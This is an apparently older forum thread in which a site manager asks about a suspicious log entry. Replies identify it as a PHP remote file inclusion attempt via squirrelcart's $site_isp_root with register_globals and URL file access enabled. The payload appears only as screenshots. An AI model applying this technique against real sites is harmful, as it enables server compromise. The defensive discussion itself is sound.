Hack attempt? need advice

software development

#1

Hey folks, I could really use some advice from someone with more PHP experience than me. I apologize in advance for all the screenshots–I didn’t know as it’d be advisable to post the text of some of this.

Today I saw this odd URL in the logs for a site I’m managing for someone (and this isn’t one of my sites, so it’s not hosted at dreamhost so I can’t contact support about it–but I really am in over my head with this so I’m hoping someone here will help me anyway :slight_smile: )
screenshot of URL (where the proper store URL would’ve been http://example.com/store.php ). That URL was requested three times in within a span of two minutes and ten seconds from three different IP addresses.

The http://ip address/dir/remote.txt? part of the URL yields a page that looks like it’s trying to inject a script that does…well, I have no idea what. Screenshot of that script passthru() works sorta like exec(), right? I’m slightly freaked about what might be happening especially after going to the URL that was being fetched by that script. I don’t really follow what’s happening in it.

I’m trying to figure out:

  • what someone is attempting to exploit here
  • how I might figure out whether the attempt succeeded or not
  • what I need to go learn in order to make sure that the code I’m writing isn’t easily exploitable.

Nothing on the site was defaced, the crontab file is empty, and there’s nothing fishy-looking in the tmp directory (but there wouldn’t be, would there, based on what I could make of the script in that screenshot?)

Any advice would be much appreciated…

~Daisy


#2

Okay, I’m still reading the script that was fetched by that bit of code. It looks like a DDOS script? Ack.

~Daisy


#3

Okay, after this I promise I’m done replying to myself to add random info.

But in case anyone wants to have a look to see if the code to the page in question looks exploitable somehow, I yanked out all the identifying info and uploaded a text file: store.txt

It’s just a paypal shopping cart w/ a database query and a while statement to fill in item specifics, but since I wrote it myself I don’t know as I might have inadvertently left some sort of security flaw?

~Daisy


#4

Just a thought, but maybe this is how spammers get contact info to send those phishing emails about “your paypal account has been compromised”

I presume there is some identifying information available that is specific to your account in the live form. Perhaps you could post to a server side script so all of the relevent info isn’t readily visible on the net?

I would be willing to offer some more input if I had a better idea of what the live page looks like. Feel free to send me a PM if you’d rather not post a real link here.

BC Tech
Team Shocker


#5

This is why DreamHost disabled remote file access (opening files in PHP by URL).

$site_isp_root is a variable used by squirrelcart.

So if a PHP site has register globals on, remote file access on, and runs squirrelcart, squirrelcart would download that script.

Well, at least that is what I get from searching Google for ‘site_isp_root’.

So yes it is an exploit attempt. Your code is not vulnerable to this exploit of course.

:cool: [color=#6600CC]Atropos[/color] | openvein.org